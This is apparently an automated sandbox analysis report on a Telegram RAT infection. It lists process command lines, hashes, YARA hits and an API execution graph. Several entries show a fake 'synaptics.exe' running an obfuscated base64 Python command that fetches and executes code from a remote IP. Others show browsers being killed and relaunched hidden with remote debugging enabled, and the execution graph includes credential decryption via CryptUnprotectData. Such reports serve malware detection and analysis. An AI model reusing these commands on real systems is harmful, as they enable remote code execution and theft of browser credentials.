                                                                                                                                                                                                            Commandline:"C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe" -c "import base64;exec(base64.b64decode('aW1wb3J0IHVybGxpYi5yZXF1ZXN0O2ltcG9ydCBiYXNlNjQ7ZXhlYyhiYXNlNjQuYjY0ZGVjb2RlKHVybGxpYi5yZXF1ZXN0LnVybG9wZW4oJ2h0dHA6Ly80Mi45Ni4xMC44L1ZPSU5FX0JVJykucmVhZCgpLmRlY29kZSgndXRmLTgnKSkp'))"
                                                                                                                                                                                                            Imagebase:0xca0000
                                                                                                                                                                                                            File size:100'120 bytes
                                                                                                                                                                                                            MD5 hash:8AD6C16026FF6C01453D5FA392C14CB4
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            Target ID:22
                                                                                                                                                                                                            Start time:07:26:31
                                                                                                                                                                                                            Start date:13/11/2024
                                                                                                                                                                                                            Path:C:\Windows\explorer.exe
                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                            Commandline:"C:\Windows\Explorer.EXE" C:\Users\user\AppData\Local\WindowsSecurity.lnk
                                                                                                                                                                                                            Imagebase:0x7ff72b770000
                                                                                                                                                                                                            File size:5'141'208 bytes
                                                                                                                                                                                                            MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            Target ID:23
                                                                                                                                                                                                            Start time:07:26:31
                                                                                                                                                                                                            Start date:13/11/2024
                                                                                                                                                                                                            Path:C:\Windows\explorer.exe
                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                            Commandline:C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
                                                                                                                                                                                                            Imagebase:0x7ff72b770000
                                                                                                                                                                                                            File size:5'141'208 bytes
                                                                                                                                                                                                            MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                                            Target ID:24
                                                                                                                                                                                                            Start time:07:26:31
                                                                                                                                                                                                            Start date:13/11/2024
                                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:"C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe" -c "import base64;exec(base64.b64decode('aW1wb3J0IHVybGxpYi5yZXF1ZXN0O2ltcG9ydCBiYXNlNjQ7ZXhlYyhiYXNlNjQuYjY0ZGVjb2RlKHVybGxpYi5yZXF1ZXN0LnVybG9wZW4oJ2h0dHA6Ly80Mi45Ni4xMC44L1ZPSU5FX0JVJykucmVhZCgpLmRlY29kZSgndXRmLTgnKSkp'))"
                                                                                                                                                                                                            Imagebase:0xca0000
                                                                                                                                                                                                            File size:100'120 bytes
                                                                                                                                                                                                            MD5 hash:8AD6C16026FF6C01453D5FA392C14CB4
                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                            • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000018.00000002.3066959428.00000000038D9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                            • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000018.00000002.3077126094.0000000004870000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                                            Target ID:25
                                                                                                                                                                                                            Start time:07:26:39
                                                                                                                                                                                                            Start date:13/11/2024
                                                                                                                                                                                                            Path:C:\Windows\explorer.exe
                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                            Commandline:"C:\Windows\Explorer.EXE" C:\Users\user\AppData\Local\WindowsSecurity.lnk
                                                                                                                                                                                                            Imagebase:0x7ff72b770000
                                                                                                                                                                                                            File size:5'141'208 bytes
                                                                                                                                                                                                            MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            Target ID:26
                                                                                                                                                                                                            Start time:07:26:39
                                                                                                                                                                                                            Start date:13/11/2024
                                                                                                                                                                                                            Path:C:\Windows\explorer.exe
                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                            Commandline:C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
                                                                                                                                                                                                            Imagebase:0x7ff72b770000
                                                                                                                                                                                                            File size:5'141'208 bytes
                                                                                                                                                                                                            MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                                            Target ID:27
                                                                                                                                                                                                            Start time:07:26:39
                                                                                                                                                                                                            Start date:13/11/2024
                                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:"C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe" -c "import base64;exec(base64.b64decode('aW1wb3J0IHVybGxpYi5yZXF1ZXN0O2ltcG9ydCBiYXNlNjQ7ZXhlYyhiYXNlNjQuYjY0ZGVjb2RlKHVybGxpYi5yZXF1ZXN0LnVybG9wZW4oJ2h0dHA6Ly80Mi45Ni4xMC44L1ZPSU5FX0JVJykucmVhZCgpLmRlY29kZSgndXRmLTgnKSkp'))"
                                                                                                                                                                                                            Imagebase:0xca0000
                                                                                                                                                                                                            File size:100'120 bytes
                                                                                                                                                                                                            MD5 hash:8AD6C16026FF6C01453D5FA392C14CB4
                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                            • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000001B.00000003.2786624765.0000000003ACB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                            • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000001B.00000003.2785465597.0000000003AAB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                            • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000001B.00000002.3067343152.0000000003AAB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                            • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000001B.00000002.3071266384.0000000003CE0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                            • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000001B.00000003.2805121636.0000000003AAB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                                            Target ID:28
                                                                                                                                                                                                            Start time:07:26:52
                                                                                                                                                                                                            Start date:13/11/2024
                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:taskkill /F /IM chrome.exe
                                                                                                                                                                                                            Imagebase:0x2b0000
                                                                                                                                                                                                            File size:74'240 bytes
                                                                                                                                                                                                            MD5 hash:CA313FD7E6C2A778FFD21CFB5C1C56CD
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            Target ID:29
                                                                                                                                                                                                            Start time:07:26:52
                                                                                                                                                                                                            Start date:13/11/2024
                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            Target ID:30
                                                                                                                                                                                                            Start time:07:26:52
                                                                                                                                                                                                            Start date:13/11/2024
                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:taskkill /F /IM chrome.exe
                                                                                                                                                                                                            Imagebase:0x2b0000
                                                                                                                                                                                                            File size:74'240 bytes
                                                                                                                                                                                                            MD5 hash:CA313FD7E6C2A778FFD21CFB5C1C56CD
                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            Target ID:31
                                                                                                                                                                                                            Start time:07:26:52
                                                                                                                                                                                                            Start date:13/11/2024
                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            Target ID:32
                                                                                                                                                                                                            Start time:07:26:53
                                                                                                                                                                                                            Start date:13/11/2024
                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:taskkill /F /IM chrome.exe
                                                                                                                                                                                                            Imagebase:0x2b0000
                                                                                                                                                                                                            File size:74'240 bytes
                                                                                                                                                                                                            MD5 hash:CA313FD7E6C2A778FFD21CFB5C1C56CD
                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            Target ID:33
                                                                                                                                                                                                            Start time:07:26:53
                                                                                                                                                                                                            Start date:13/11/2024
                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            Target ID:34
                                                                                                                                                                                                            Start time:07:26:53
                                                                                                                                                                                                            Start date:13/11/2024
                                                                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                            Commandline:"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
                                                                                                                                                                                                            Imagebase:0x7ff76e190000
                                                                                                                                                                                                            File size:3'242'272 bytes
                                                                                                                                                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            Target ID:35
                                                                                                                                                                                                            Start time:07:26:53
                                                                                                                                                                                                            Start date:13/11/2024
                                                                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                            Commandline:"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
                                                                                                                                                                                                            Imagebase:0x7ff76e190000
                                                                                                                                                                                                            File size:3'242'272 bytes
                                                                                                                                                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            Target ID:36
                                                                                                                                                                                                            Start time:07:26:54
                                                                                                                                                                                                            Start date:13/11/2024
                                                                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                            Commandline:"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
                                                                                                                                                                                                            Imagebase:0x7ff76e190000
                                                                                                                                                                                                            File size:3'242'272 bytes
                                                                                                                                                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            Target ID:37
                                                                                                                                                                                                            Start time:07:26:56
                                                                                                                                                                                                            Start date:13/11/2024
                                                                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --mojo-platform-channel-handle=1980 --field-trial-handle=1952,i,12130508596491223167,1187970668335390785,262144 /prefetch:8
                                                                                                                                                                                                            Imagebase:0x7ff76e190000
                                                                                                                                                                                                            File size:3'242'272 bytes
                                                                                                                                                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                                            Target ID:38
                                                                                                                                                                                                            Start time:07:26:56
                                                                                                                                                                                                            Start date:13/11/2024
                                                                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --mojo-platform-channel-handle=2016 --field-trial-handle=1156,i,13827792788180171334,7255104134237789942,262144 /prefetch:8
                                                                                                                                                                                                            Imagebase:0x7ff76e190000
                                                                                                                                                                                                            File size:3'242'272 bytes
                                                                                                                                                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            Target ID:39
                                                                                                                                                                                                            Start time:07:27:03
                                                                                                                                                                                                            Start date:13/11/2024
                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:taskkill /F /IM msedge.exe
                                                                                                                                                                                                            Imagebase:0x2b0000
                                                                                                                                                                                                            File size:74'240 bytes
                                                                                                                                                                                                            MD5 hash:CA313FD7E6C2A778FFD21CFB5C1C56CD
                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            Target ID:40
                                                                                                                                                                                                            Start time:07:27:03
                                                                                                                                                                                                            Start date:13/11/2024
                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            Target ID:41
                                                                                                                                                                                                            Start time:07:27:04
                                                                                                                                                                                                            Start date:13/11/2024
                                                                                                                                                                                                            Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                            Commandline:"C:/Program Files (x86)/Microsoft/Edge/Application/msedge.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
                                                                                                                                                                                                            Imagebase:0x7ff67dcd0000
                                                                                                                                                                                                            File size:4'210'216 bytes
                                                                                                                                                                                                            MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            Target ID:42
                                                                                                                                                                                                            Start time:07:27:07
                                                                                                                                                                                                            Start date:13/11/2024
                                                                                                                                                                                                            Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                            Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-sandbox --mojo-platform-channel-handle=2572 --field-trial-handle=2448,i,15289098796550783955,16860821429903123602,262144 /prefetch:3
                                                                                                                                                                                                            Imagebase:0x7ff67dcd0000
                                                                                                                                                                                                            File size:4'210'216 bytes
                                                                                                                                                                                                            MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                                            Reset < >

                                                                                                                                                                                                              Execution Graph

                                                                                                                                                                                                              Execution Coverage:0.7%
                                                                                                                                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                              Signature Coverage:35.3%
                                                                                                                                                                                                              Total number of Nodes:419
                                                                                                                                                                                                              Total number of Limit Nodes:70
                                                                                                                                                                                                              execution_graph 78825 6c1146f0 78827 6c114720 78825->78827 78833 6c11472d 78825->78833 78826 6c114959 memmove 78829 6c114971 78826->78829 78827->78826 78827->78833 78830 6c114a51 78829->78830 78832 6c114a09 78829->78832 78834 6c0c55f0 78829->78834 78831 6c114b1b memmove 78830->78831 78830->78833 78831->78833 78835 6c0c5601 78834->78835 78838 6c0c5668 78834->78838 78836 6c0c565b 78835->78836 78839 6c0c5611 78835->78839 78842 6c0c5270 78836->78842 78838->78830 78839->78838 78840 6c0c563b memmove 78839->78840 78841 6c0c564a 78840->78841 78841->78830 78843 6c0c527f 78842->78843 78844 6c0c5294 78842->78844 78843->78838 78845 6c0c52a0 sqlite3_free 78844->78845 78847 6c0c52b2 78844->78847 78846 6c0c52a9 78845->78846 78846->78838 78847->78846 78849 6c0c4730 realloc 78847->78849 78850 6c0c474a _msize sqlite3_log 78849->78850 78851 6c0c476b 78849->78851 78850->78851 78851->78846 78852 6c13c210 78853 6c13c228 78852->78853 78854 6c13c2cc 78852->78854 78853->78854 78855 6c13c258 78853->78855 78856 6c0fdc10 93 API calls 78853->78856 78862 6c0fdc10 78855->78862 78856->78855 78859 6c0fdc10 93 API calls 78860 6c13c2a4 78859->78860 78860->78854 78861 6c0fdc10 93 API calls 78860->78861 78861->78854 78864 6c0fddcc 78862->78864 78868 6c0fdc27 78862->78868 78864->78854 78864->78859 78865 6c0fdb20 93 API calls 78865->78868 78867 6c0fdc10 93 API calls 78867->78868 78868->78864 78868->78865 78868->78867 78870 6c13b280 78868->78870 78896 6c0fdbc0 93 API calls 78868->78896 78897 6c0fda40 93 API calls 78868->78897 78877 6c13b2c0 78870->78877 78881 6c13b2bc 78870->78881 78871 6c13b667 78871->78877 78924 6c132f80 10 API calls 78871->78924 78873 6c0fdc10 79 API calls 78873->78881 78876 6c13b3cf memset 78876->78881 78877->78868 78880 6c13b42a memmove 78880->78881 78881->78871 78881->78873 78881->78876 78881->78877 78881->78880 78898 6c13adb0 78881->78898 78916 6c112b70 78881->78916 78922 6c135920 memset memmove sqlite3_randomness memset 78881->78922 78923 6c116e20 93 API calls 78881->78923 78882 6c13b995 memset 78883 6c13b67f 78882->78883 78884 6c13b9b6 memmove 78882->78884 78883->78877 78883->78882 78885 6c1034e0 realloc _msize sqlite3_log sqlite3_free memmove 78883->78885 78886 6c13bb8d memset 78883->78886 78888 6c13bc67 memset 78883->78888 78890 6c13bcbd memset 78883->78890 78891 6c13c0c5 memmove 78883->78891 78892 6c13bfd8 memmove 78883->78892 78893 6c13bdb7 memset 78883->78893 78895 6c13be10 memset 78883->78895 78884->78883 78885->78883 78886->78883 78887 6c13bbae memmove 78886->78887 78887->78883 78888->78883 78889 6c13bc88 memmove 78888->78889 78889->78883 78890->78883 78891->78883 78892->78883 78893->78883 78894 6c13bdd8 memmove 78893->78894 78894->78883 78895->78883 78896->78868 78897->78868 78899 6c13add2 78898->78899 78902 6c13ae44 78898->78902 78900 6c13aed6 memset 78899->78900 78899->78902 78901 6c13aeea 78900->78901 78903 6c13af57 78901->78903 78904 6c13afa9 memmove 78901->78904 78912 6c13af55 78901->78912 78902->78881 78903->78881 78904->78912 78905 6c13b14e 78907 6c0fdc10 91 API calls 78905->78907 78906 6c13b08d 78908 6c0fdc10 91 API calls 78906->78908 78909 6c13b09d 78907->78909 78908->78909 78913 6c13b16c 78909->78913 78925 6c135920 memset memmove sqlite3_randomness memset 78909->78925 78911 6c13b1ed 78914 6c13b218 78911->78914 78915 6c0fdc10 91 API calls 78911->78915 78912->78902 78912->78905 78912->78906 78913->78881 78914->78881 78915->78914 78917 6c112b8e 78916->78917 78920 6c112ba1 78916->78920 78917->78920 78926 6c1316b0 78917->78926 78919 6c112ba5 78919->78881 78920->78919 78932 6c147f20 sqlite3_free memset memmove 78920->78932 78922->78881 78923->78881 78924->78883 78925->78911 78927 6c1316e3 78926->78927 78930 6c1316ed 78926->78930 78933 6c131240 78927->78933 78929 6c131733 78929->78920 78930->78929 78931 6c131240 64 API calls 78930->78931 78931->78930 78932->78919 78953 6c130ef0 78933->78953 78935 6c131309 78985 6c1bf614 5 API calls ___raise_securityfailure 78935->78985 78936 6c1312df 78936->78935 78944 6c1313b1 78936->78944 78952 6c13135d 78936->78952 78972 6c0dd980 78936->78972 78939 6c1316a2 78939->78930 78941 6c131346 78942 6c13134f 78941->78942 78941->78944 78943 6c131388 memmove 78942->78943 78942->78952 78943->78952 78945 6c131572 sqlite3_exec 78944->78945 78948 6c131456 78944->78948 78946 6c1315af 78945->78946 78946->78948 78981 6c110ad0 sqlite3_exec memmove 78946->78981 78948->78952 78982 6c0dea30 47 API calls 78948->78982 78950 6c131633 78950->78952 78983 6c0dec30 memset 78950->78983 78952->78935 78984 6c112fb0 8 API calls 78952->78984 78954 6c130f13 78953->78954 78955 6c13122a 78953->78955 78956 6c130f1c 78954->78956 78960 6c130f36 78954->78960 78955->78936 78986 6c130df0 sqlite3_log 78956->78986 78958 6c130f27 78958->78936 78961 6c130f6c 78960->78961 78965 6c1311b2 78960->78965 78963 6c130fb4 78961->78963 78987 6c130df0 sqlite3_log 78961->78987 78964 6c13100d 78963->78964 78967 6c13101f sqlite3_errmsg 78963->78967 78964->78955 78966 6c131051 sqlite3_log sqlite3_log 78964->78966 78969 6c131084 78964->78969 78965->78955 78990 6c130df0 sqlite3_log 78965->78990 78966->78936 78988 6c130df0 sqlite3_log 78967->78988 78989 6c166b20 41 API calls 78969->78989 78971 6c1311a9 78971->78936 78977 6c0dd9a0 78972->78977 78973 6c0dd9f9 78973->78941 78974 6c0ddc29 78974->78973 79000 6c0d6b80 6 API calls 78974->79000 78977->78973 78977->78974 78978 6c0ddba6 78977->78978 78991 6c0dd620 78977->78991 78998 6c0dd8e0 6 API calls 78977->78998 78978->78973 78978->78974 78999 6c0d6800 memset memset memset memset memset 78978->78999 78981->78948 78982->78950 78983->78952 78984->78935 78985->78939 78986->78958 78987->78963 78988->78964 78989->78971 78990->78955 79001 6c0d5820 78991->79001 78993 6c0dd632 78996 6c0dd6b4 78993->78996 79023 6c0d5b70 78993->79023 78994 6c0dd64d 78994->78996 79037 6c1699f0 sqlite3_log 78994->79037 78996->78977 78998->78977 78999->78974 79000->78973 79009 6c0d5846 79001->79009 79016 6c0d59a6 79001->79016 79002 6c0d5b4f 79044 6c1bf614 5 API calls ___raise_securityfailure 79002->79044 79003 6c0d5b35 79043 6c1bf614 5 API calls ___raise_securityfailure 79003->79043 79004 6c0d5afb 79004->79002 79004->79003 79006 6c0d5b66 79006->78993 79007 6c0d5895 79038 6c1bf614 5 API calls ___raise_securityfailure 79007->79038 79009->79003 79009->79007 79009->79016 79017 6c0d58b4 79009->79017 79010 6c0d5b4b 79010->78993 79013 6c0d58b0 79013->78993 79014 6c0d5967 79014->79016 79019 6c0d5985 79014->79019 79015 6c0d5939 79015->79014 79015->79019 79040 6c0d3910 8 API calls __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 79015->79040 79016->79003 79016->79004 79042 6c0d08d0 memset 79016->79042 79017->79003 79017->79015 79039 6c169a50 sqlite3_log 79017->79039 79041 6c1bf614 5 API calls ___raise_securityfailure 79019->79041 79021 6c0d59a2 79021->78993 79024 6c0d5b81 sqlite3_log 79023->79024 79025 6c0d5ba9 79023->79025 79024->78994 79026 6c0d5cf7 79025->79026 79027 6c0d5cd2 sqlite3_log 79025->79027 79029 6c0d5c75 79025->79029 79028 6c0d5d24 79026->79028 79031 6c0d5d0b 79026->79031 79027->79029 79028->79029 79030 6c0d5d8f memset 79028->79030 79033 6c0d5d7b 79028->79033 79051 6c0cfd80 memset memset 79028->79051 79029->78994 79030->79029 79045 6c0d3c70 79031->79045 79052 6c0d2890 memset memset memset memset 79033->79052 79036 6c0d5d84 79036->79030 79037->78996 79038->79013 79039->79015 79040->79014 79041->79021 79042->79004 79043->79010 79044->79006 79046 6c0d3c99 79045->79046 79048 6c0d3ca6 79045->79048 79065 6c0d9a80 7 API calls 79046->79065 79049 6c0d3cb9 79048->79049 79053 6c0cb850 79048->79053 79049->79029 79051->79033 79052->79036 79057 6c0cb874 79053->79057 79064 6c0cb8e0 79053->79064 79054 6c0cb8b1 memmove 79054->79064 79055 6c0cb900 ReadFile 79058 6c0cb99b 79055->79058 79055->79064 79056 6c0cb896 memmove 79059 6c0cb8a8 79056->79059 79057->79054 79057->79056 79057->79064 79060 6c0cb99f sqlite3_log 79058->79060 79061 6c0cb9c6 79058->79061 79059->79049 79060->79061 79061->79059 79062 6c0cb9d1 memset 79061->79062 79062->79049 79063 6c0cb972 79063->79049 79064->79055 79064->79058 79064->79063 79065->79048 79066 6bf68300 PyArg_ParseTupleAndKeywords 79067 6bf6835a 79066->79067 79068 6bf68366 79066->79068 79067->79068 79069 6bf68383 ??0PyWinBufferView@@QAE@PAU_object@@_N1 79067->79069 79070 6bf683b7 ??1PyWinBufferView@@QAE 79069->79070 79071 6bf683c5 ??1PyWinBufferView@@QAE 79069->79071 79072 6bf683e8 79071->79072 79081 6bf683f1 79071->79081 79083 6bf65db0 ??0PyWinBufferView@@QAE@PAU_object@@_N1 ??1PyWinBufferView@@QAE ??1PyWinBufferView@@QAE 79072->79083 79074 6bf68429 PyEval_SaveThread CryptUnprotectData PyEval_RestoreThread 79075 6bf68482 PyBytes_FromStringAndSize 